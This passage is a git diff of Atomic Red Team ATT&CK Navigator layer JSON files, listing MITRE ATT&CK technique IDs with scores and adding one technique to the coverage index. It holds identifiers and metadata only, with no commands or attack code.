,{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index cf3aef14..9444f3fc 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled"